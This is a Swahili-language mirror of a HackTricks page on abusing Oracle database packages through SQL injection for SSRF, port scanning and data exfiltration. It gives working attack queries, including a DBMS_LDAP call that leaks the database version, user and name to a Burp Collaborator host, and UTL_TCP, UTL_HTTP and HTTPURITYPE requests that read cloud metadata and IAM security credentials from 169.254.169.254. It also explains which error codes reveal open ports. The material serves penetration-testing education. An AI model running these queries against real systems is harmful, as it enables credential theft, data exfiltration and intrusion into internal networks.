mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-13 06:42:54 +00:00
169 lines
10 KiB
Markdown
169 lines
10 KiB
Markdown
# Uvamizi wa Oracle
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu uvamizi wa AWS kutoka mwanzo hadi mtaalam wa juu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
|
|
|
</details>
|
|
|
|
**Toa nakala ya machapisho haya kutoka kwenye tovuti ya wayback machine ya chapisho lililofutwa kutoka [https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/)**.
|
|
|
|
## SSRF
|
|
|
|
Kutumia Oracle kufanya maombi ya HTTP na DNS nje ya kawaida ni jambo lililodhibitishwa vizuri lakini kama njia ya kuvuja data ya SQL katika uvamizi. Tunaweza daima kurekebisha mbinu/huduma hizi ili kufanya SSRF/XSPA nyingine.
|
|
|
|
Kuweka Oracle kunaweza kuwa jambo gumu sana, haswa ikiwa unataka kuweka mfano wa haraka wa kujaribu amri. Rafiki yangu na mwenzangu katika [Appsecco](https://appsecco.com), [Abhisek Datta](https://github.com/abhisek), alinielekeza kwenye [https://github.com/MaksymBilenko/docker-oracle-12c](https://github.com/MaksymBilenko/docker-oracle-12c) ambayo iliniruhusu kuweka mfano kwenye kompyuta ya AWS Ubuntu ya t2.large na Docker.
|
|
|
|
Nilikimbia amri ya docker na bendera ya `--network="host"` ili niweze kuiga Oracle kama ufungaji wa asili na ufikiaji kamili wa mtandao, kwa muda wa chapisho hili la blogu.
|
|
```
|
|
docker run -d --network="host" quay.io/maksymbilenko/oracle-12c
|
|
```
|
|
#### Paketi za Oracle zinazounga mkono URL au maelezo ya Jina la Mwenyeji/Namba ya Bandari <a href="#oracle-packages-that-support-a-url-or-a-hostname-port-number-specification" id="oracle-packages-that-support-a-url-or-a-hostname-port-number-specification"></a>
|
|
|
|
Ili kupata paketi na kazi zozote zinazounga mkono maelezo ya jina la mwenyeji na namba ya bandari, nilifanya utafutaji kwenye [Hati za Mtandaoni za Oracle Database](https://docs.oracle.com/database/121/index.html). Kwa usahihi,
|
|
```
|
|
site:docs.oracle.com inurl:"/database/121/ARPLS" "host"|"hostname" "port"|"portnum"
|
|
```
|
|
Utafutaji ulirudi matokeo yafuatayo (si yote yanaweza kutumika kufanya mtandao wa nje):
|
|
|
|
* DBMS\_NETWORK\_ACL\_ADMIN
|
|
* UTL\_SMTP
|
|
* DBMS\_XDB
|
|
* DBMS\_SCHEDULER
|
|
* DBMS\_XDB\_CONFIG
|
|
* DBMS\_AQ
|
|
* UTL\_MAIL
|
|
* DBMS\_AQELM
|
|
* DBMS\_NETWORK\_ACL\_UTILITY
|
|
* DBMS\_MGD\_ID\_UTL
|
|
* UTL\_TCP
|
|
* DBMS\_MGWADM
|
|
* DBMS\_STREAMS\_ADM
|
|
* UTL\_HTTP
|
|
|
|
Utafutaji huu wa kawaida unapuuza pakiti kama `DBMS_LDAP` (ambayo inaruhusu kupitisha jina la mwenyeji na nambari ya bandari) kama [ukurasa wa nyaraka](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360) unakuelekeza tu kwenye [eneo tofauti](https://docs.oracle.com/database/121/ARPLS/d\_ldap.htm#ARPLS360). Hivyo, kuna pakiti zingine za Oracle ambazo zinaweza kutumiwa vibaya kufanya maombi ya nje ambazo nimezikosa.
|
|
|
|
Kwa hali yoyote, hebu tuangalie baadhi ya pakiti ambazo tumegundua na kuziorodhesha hapo juu.
|
|
|
|
**DBMS\_LDAP.INIT**
|
|
|
|
Pakiti ya `DBMS_LDAP` inaruhusu kupata data kutoka kwenye seva za LDAP. Kazi ya `init()` inaanzisha kikao na seva ya LDAP na inachukua jina la mwenyeji na nambari ya bandari kama hoja.
|
|
|
|
Kazi hii imekwisha elezewa hapo awali kuonyesha utekaji wa data kupitia DNS, kama ifuatavyo
|
|
```
|
|
SELECT DBMS_LDAP.INIT((SELECT version FROM v$instance)||'.'||(SELECT user FROM dual)||'.'||(select name from V$database)||'.'||'d4iqio0n80d5j4yg7mpu6oeif9l09p.burpcollaborator.net',80) FROM dual;
|
|
```
|
|
Hata hivyo, ukizingatia kuwa kazi inakubali jina la mwenyeji na nambari ya bandari kama hoja, unaweza kutumia hii kufanya kazi kama skana ya bandari pia.
|
|
|
|
Hapa kuna mifano michache
|
|
```
|
|
SELECT DBMS_LDAP.INIT('scanme.nmap.org',22) FROM dual;
|
|
SELECT DBMS_LDAP.INIT('scanme.nmap.org',25) FROM dual;
|
|
SELECT DBMS_LDAP.INIT('scanme.nmap.org',80) FROM dual;
|
|
SELECT DBMS_LDAP.INIT('scanme.nmap.org',8080) FROM dual;
|
|
```
|
|
`ORA-31203: DBMS_LDAP: PL/SQL - Init Failed.` inaonyesha kuwa bandari imefungwa wakati thamani ya kikao inaashiria kuwa bandari iko wazi.
|
|
|
|
**UTL\_SMTP**
|
|
|
|
Kifurushi cha `UTL_SMTP` kimeundwa kwa ajili ya kutuma barua pepe kupitia SMTP. Mfano uliotolewa kwenye [tovuti ya nyaraka za Oracle inaonyesha jinsi unavyoweza kutumia kifurushi hiki kutuma barua pepe](https://docs.oracle.com/database/121/ARPLS/u\_smtp.htm#ARPLS71478). Kwetu sisi, hata hivyo, jambo linalovutia ni uwezo wa kutoa maelezo ya mwenyeji na bandari.
|
|
|
|
Mfano wa kubahatisha unaonyeshwa hapa chini na kazi ya `UTL_SMTP.OPEN_CONNECTION`, na muda wa kusubiri wa sekunde 2
|
|
```
|
|
DECLARE c utl_smtp.connection;
|
|
BEGIN
|
|
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',80,2);
|
|
END;
|
|
```
|
|
|
|
```
|
|
DECLARE c utl_smtp.connection;
|
|
BEGIN
|
|
c := UTL_SMTP.OPEN_CONNECTION('scanme.nmap.org',8080,2);
|
|
END;
|
|
```
|
|
`ORA-29276: transfer timeout` inaonyesha kuwa bandari iko wazi lakini hakuna uhusiano wa SMTP ulioanzishwa wakati `ORA-29278: SMTP transient error: 421 Service not available` inaonyesha kuwa bandari imefungwa.
|
|
|
|
**UTL\_TCP**
|
|
|
|
Kifurushi cha `UTL_TCP` na taratibu na kazi zake kuruhusu [mawasiliano yanayotegemea TCP/IP na huduma](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). Ikiwa imeprogramuwa kwa huduma maalum, kifurushi hiki kinaweza kuwa njia rahisi ya kuingia kwenye mtandao au kutekeleza Maombi ya Upande wa Seva kwani vipengele vyote vya uhusiano wa TCP/IP vinaweza kudhibitiwa.
|
|
|
|
Mfano [kwenye tovuti ya nyaraka za Oracle unaonyesha jinsi unavyoweza kutumia kifurushi hiki kuunda uhusiano wa TCP safi ili kupata ukurasa wa wavuti](https://docs.oracle.com/cd/B28359\_01/appdev.111/b28419/u\_tcp.htm#i1004190). Tunaweza kuifanya iwe rahisi zaidi na kutumia kuomba kwa mfano kwa kielelezo cha metadata au kwa huduma yoyote ya TCP/IP isiyojulikana.
|
|
```
|
|
set serveroutput on size 30000;
|
|
SET SERVEROUTPUT ON
|
|
DECLARE c utl_tcp.connection;
|
|
retval pls_integer;
|
|
BEGIN
|
|
c := utl_tcp.open_connection('169.254.169.254',80,tx_timeout => 2);
|
|
retval := utl_tcp.write_line(c, 'GET /latest/meta-data/ HTTP/1.0');
|
|
retval := utl_tcp.write_line(c);
|
|
BEGIN
|
|
LOOP
|
|
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
|
|
END LOOP;
|
|
EXCEPTION
|
|
WHEN utl_tcp.end_of_input THEN
|
|
NULL;
|
|
END;
|
|
utl_tcp.close_connection(c);
|
|
END;
|
|
/
|
|
```
|
|
|
|
```
|
|
DECLARE c utl_tcp.connection;
|
|
retval pls_integer;
|
|
BEGIN
|
|
c := utl_tcp.open_connection('scanme.nmap.org',22,tx_timeout => 4);
|
|
retval := utl_tcp.write_line(c);
|
|
BEGIN
|
|
LOOP
|
|
dbms_output.put_line(utl_tcp.get_line(c, TRUE));
|
|
END LOOP;
|
|
EXCEPTION
|
|
WHEN utl_tcp.end_of_input THEN
|
|
NULL;
|
|
END;
|
|
utl_tcp.close_connection(c);
|
|
END;
|
|
```
|
|
Kwa kushangaza, kutokana na uwezo wa kuunda ombi la TCP la moja kwa moja, kifurushi hiki pia kinaweza kutumika kuuliza huduma ya meta-data ya Kifaa cha Wingu cha watoa huduma wote wa wingu kwa sababu aina ya njia na vichwa vya ziada vinaweza kupitishwa ndani ya ombi la TCP.
|
|
|
|
**UTL\_HTTP na Ombi za Wavuti**
|
|
|
|
Labda njia ya kawaida na iliyoandikwa sana katika kila mafunzo ya Oracle SQL Injection nje ya Band ni [`kifurushi cha UTL_HTTP`](https://docs.oracle.com/database/121/ARPLS/u\_http.htm#ARPLS070). Kifurushi hiki kimefafanuliwa na nyaraka kama - `Kifurushi cha UTL_HTTP kinafanya wito wa Hypertext Transfer Protocol (HTTP) kutoka SQL na PL/SQL. Unaweza kutumia kifurushi hiki kupata data kwenye Mtandao kupitia HTTP.`
|
|
```
|
|
select UTL_HTTP.request('http://169.254.169.254/latest/meta-data/iam/security-credentials/adminrole') from dual;
|
|
```
|
|
Unaweza pia kutumia hii kufanya uchunguzi wa bandari za msingi kwa kutumia maswali kama vile
|
|
```
|
|
select UTL_HTTP.request('http://scanme.nmap.org:22') from dual;
|
|
select UTL_HTTP.request('http://scanme.nmap.org:8080') from dual;
|
|
select UTL_HTTP.request('http://scanme.nmap.org:25') from dual;
|
|
```
|
|
`ORA-12541: TNS:no listener` au `TNS:operation timed out` ni ishara kwamba bandari ya TCP imefungwa, wakati `ORA-29263: HTTP protocol error` au data ni ishara kwamba bandari imefunguliwa.
|
|
|
|
Kifurushi kingine nilichotumia hapo awali na mafanikio tofauti ni [`GETCLOB()` method ya aina ya kawaida ya Oracle ya `HTTPURITYPE`](https://docs.oracle.com/database/121/ARPLS/t\_dburi.htm#ARPLS71705) ambayo inakuwezesha kuingiliana na URL na inatoa msaada kwa itifaki ya HTTP. `GETCLOB()` method hutumiwa kupata majibu ya GET kutoka kwenye URL kama aina ya data ya [CLOB.](https://docs.oracle.com/javadb/10.10.1.2/ref/rrefclob.html)[select HTTPURITYPE('http://169.254.169.254/latest/meta-data/instance-id').getclob() from dual;
|
|
|
|
<details>
|
|
|
|
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Njia nyingine za kusaidia HackTricks:
|
|
|
|
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
|
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
|
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|